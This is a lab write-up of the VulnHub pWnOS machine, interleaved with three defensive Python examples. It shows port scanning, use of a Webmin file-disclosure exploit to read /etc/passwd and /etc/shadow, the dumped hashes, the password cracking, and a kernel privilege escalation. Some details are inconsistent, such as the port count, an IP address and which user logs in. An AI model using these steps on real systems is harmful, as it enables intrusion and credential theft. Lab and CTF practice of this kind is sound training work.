vulnhub (8): pWnOS (a foothold before the information gathering was even finished)
Ports
nmap host discovery
nmap -sn 192.168.89.0/24

Nmap scan report for 192.168.89.116
Host is up (0.00020s latency).

.116 is the machine that just appeared, so it is the target.
nmap port scan
nmap -Pn 192.168.89.116 -p- --min-rate 10000 -oA nmap/scan

Scan all ports and save the results under nmap/scan.

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt

Found 3 open ports.
nmap -sT -sC -sV -O -p22,80,111 -oA nmap/scan 192.168.89.116

Detailed port scan:
-sT: full TCP connect scan
-sC: default script scan
-sV: service version detection
-O: OS detection

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
|   1024 e44640bfe629acc600e2b2a3e150903c (DSA)
|_  2048 10cc35458ef27aa1ccdba0e8bfc7733d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: Site doesn't have a title (text/html).
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h30m01s, deviation: 3h32m07s, median: 1s
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   NetBIOS computer name:
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|_  System time: 2024-09-14T00:04:37-05:00

Analysis:
22: ssh open
80: web open
139, 445: both Samba
10000: HTTP, the Webmin service
Vulnerability script scan

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| http-enum:
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
|   /index/: Potentially interesting folder
|_  /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
| http-vuln-cve2006-3392:
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|
|     Disclosure date: 2006-06-29
|     References:
|       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|       http://www.exploit-db.com/exploits/1997/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
MAC Address: 00:0C:29:5E:18:C9 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nice: Webmin came straight back with a file-disclosure vulnerability, and the check reports it as exploitable, so we just use it.
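As an added example (not part of the original write-up), a small access-log checker for the bug class the Webmin finding describes: the server removed "../" before decoding, so a path like "..%01/" slipped past the filter. The function checks the raw request path first and then the decoded path with control bytes dropped, which is how the server eventually interpreted it, so traversal that only appears after decoding is also flagged. The log lines and client IPs are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the original write-up).
SAMPLE_LOG = """\
10.0.0.5 - - [14/Sep/2024:00:10:01 -0500] "GET /unauthenticated/..%01/..%01/..%01/etc/passwd HTTP/1.0" 200 1432
10.0.0.5 - - [14/Sep/2024:00:10:02 -0500] "GET /index.html HTTP/1.1" 200 512
10.0.0.7 - - [14/Sep/2024:00:10:03 -0500] "GET /../../etc/shadow HTTP/1.1" 404 210
10.0.0.9 - - [14/Sep/2024:00:10:04 -0500] "GET /images/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 210
"""

REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
CONTROL_RE = re.compile(r'[\x00-\x1f\x7f]')

def traversal_reason(raw_path):
    """Return why a request path looks like directory traversal, or None.
    Mirrors the CVE-2006-3392 bug class: Webmin removed '../' BEFORE
    decoding, so a filter that only looks at the raw path misses '..%01/'.
    Check the raw path first, then the decoded path with control bytes
    dropped, which is the form the server ended up acting on."""
    if '../' in raw_path:
        return 'plain ../ sequence'
    normalized = CONTROL_RE.sub('', unquote(raw_path))
    if '../' in normalized:
        return 'traversal only visible after decoding'
    return None

def scan_log(text):
    """Return (client_ip, raw_path, reason) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        reason = traversal_reason(m.group(1))
        if reason:
            hits.append((line.split()[0], m.group(1), reason))
    return hits

if __name__ == '__main__':
    for ip, path, reason in scan_log(SAMPLE_LOG):
        print(f'{ip}\t{reason}\t{path}')
```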
Foothold
Port 10000
With a vulnerability already in hand, exploit it first; only if that fails do we go back and gather information on the other ports.

searchsploit webmin

Two usable scripts turn up:

Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/2017.pl

Reading both, 2017.pl comes with usage hints, so go with the simpler perl script.

./2017.pl 192.168.89.116 10000 /etc/passwd 0

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

That gives 4 users that were probably created by the administrator; with root that makes 5: vmware, obama, osama, yomama, root.

Now look at something else:

./2017.pl 192.168.89.116 10000 /etc/shadow 0

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

Now we can try cracking the hashes.
Cracking the hashes with john
The hashes are saved in hash.txt.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

This cracks the vmware user's password: h4ckm3

Logging in with ssh shows:

Unable to negotiate with 192.168.139.116 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

ssh obama@192.168.89.116 -oHostKeyAlgorithms=ssh-rsa,ssh-dss

Here the ssh login needs -oHostKeyAlgorithms so the client negotiates a host key algorithm the server actually offers.
For the full ssh authentication flow in detail, see my article on CSDN: "Red-team SSH protocol communication flow and security research" (红队ssh协议通信全流程以及安全研究-CSDN博客).
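As an added example (not part of the original write-up), a shadow-file audit that flags exactly what made the john step above cheap: md5crypt ($1$) hashes, which a wordlist run chews through quickly, and the 99999-day maximum age that keeps a cracked password valid indefinitely. The shadow lines are constructed samples with placeholder hash strings, not the hashes dumped from the target.

```python
# Constructed sample /etc/shadow lines with placeholder hash strings
# (not the real hashes dumped from the target).
SAMPLE_SHADOW = """\
root:$1$saltsalt$PLACEHOLDERmd5crypthash.:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
svc:$6$saltsalt$PLACEHOLDERsha512crypthash:19000:0:90:7:::
legacy:$1$saltsalt$PLACEHOLDERmd5crypthash.:14042:0:99999:7:::
noPass::14040:0:99999:7:::
"""

STRONG_PREFIXES = ('$5$', '$6$', '$y$', '$7$', '$2a$', '$2b$', '$2y$')

def classify_hash(field):
    """Classify the shadow password field: empty, locked, weak:<algo>, ok or unknown."""
    if field == '':
        return 'empty'             # no password at all
    if field[0] in '*!':
        return 'locked'            # password login disabled
    if field.startswith('$1$'):
        return 'weak:md5crypt'     # fast hash: a rockyou run like the one above is cheap
    if not field.startswith('$'):
        return 'weak:descrypt'     # traditional 13-character DES crypt, 8-char limit
    if field.startswith(STRONG_PREFIXES):
        return 'ok'                # sha-crypt, yescrypt, scrypt, bcrypt
    return 'unknown'

def audit_shadow(text, max_age_days=365):
    """Return {user: [findings]} for accounts that need attention.
    Fields: name:hash:lastchange:min:max:warn:inactive:expire:reserved"""
    report = {}
    for line in text.splitlines():
        fields = line.split(':')
        if len(fields) < 9:
            continue                # not a shadow entry
        user, pw, max_age = fields[0], fields[1], fields[4]
        kind = classify_hash(pw)
        findings = [] if kind in ('ok', 'locked') else [kind]
        # 99999 is the "never expires" default; a cracked password then stays valid forever.
        if kind != 'locked' and max_age.isdigit() and int(max_age) > max_age_days:
            findings.append(f'max_age={max_age}d')
        if findings:
            report[user] = findings
    return report

if __name__ == '__main__':
    for user, findings in audit_shadow(SAMPLE_SHADOW).items():
        print(f'{user}: {", ".join(findings)}')
```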
Privilege escalation
Information enumeration
sudo -l: no permissions
cat /etc/passwd: nothing new
cat /etc/crontab: no scheduled-task scripts
find / -type f -perm -u=s 2>/dev/null:

/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/smbumount
/usr/bin/chfn
/usr/bin/sudoedit
/usr/bin/newgrp
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/smbmnt
/usr/bin/at
/usr/bin/chsh
/usr/sbin/pppd
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/apache2/suexec
/bin/su
/bin/umount
/bin/ping
/bin/ping6
/bin/check-foreground-console
/bin/fusermount
/bin/mount
/sbin/mount.cifs
/sbin/umount.cifs
/lib/dhcp3-client/call-dhclient-script

I tried /usr/bin/sudoedit and found a sudoedit vulnerability whose version matches this sudo, exploit-db entry 470.c, but it appears to be an unauthorized file read, which is not what we need.
Kernel exploit privilege escalation
uname -a: get the version

Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux

searchsploit linux 2.6.2

A privilege-escalation exploit with a matching version turns up:

Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Esca | linux/local/5092.c

Upload it to the target, compile, run: root.
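As an added example (not part of the original write-up), a check that matches the kernel release string from uname -r against the version range printed in the searchsploit line above, comparing as integer tuples rather than strings so that 2.6.9 does not sort above 2.6.22. It assumes the lower bound is inclusive and the upper bound exclusive, and drops the distro build suffix ("-14-server"), which is not part of the upstream version.

```python
import re

def parse_release(release):
    """Turn a kernel release ('2.6.22-14-server' from uname -r) or an advisory
    bound ('2.6.24.1') into a tuple of ints. The distro build suffix after the
    first '-' is dropped: it is not part of the upstream kernel version."""
    base = release.split('-', 1)[0]
    nums = re.findall(r'\d+', base)
    if not nums:
        raise ValueError(f'no version number in {release!r}')
    return tuple(int(n) for n in nums)

def in_range(release, low, high):
    """True when low <= release < high, compared numerically. Python tuple
    ordering gives (2, 6, 24) < (2, 6, 24, 1), so 2.6.24 is inside the range
    while 2.6.24.1 is not."""
    v = parse_release(release)
    return parse_release(low) <= v < parse_release(high)

# Bounds as printed in the searchsploit title above; assumption: low inclusive,
# high exclusive. Patch level is what decides this, so always compare a
# running kernel against the distro's fixed package version as well.
VMSPLICE_LOW, VMSPLICE_HIGH = '2.6.17', '2.6.24.1'

def affected_by_vmsplice(release):
    """Does this uname -r string fall inside the advertised vmsplice range?"""
    return in_range(release, VMSPLICE_LOW, VMSPLICE_HIGH)

if __name__ == '__main__':
    for rel in ('2.6.22-14-server', '2.6.24.1', '2.6.16-2-686', '2.6.24'):
        print(rel, 'affected' if affected_by_vmsplice(rel) else 'not affected')
```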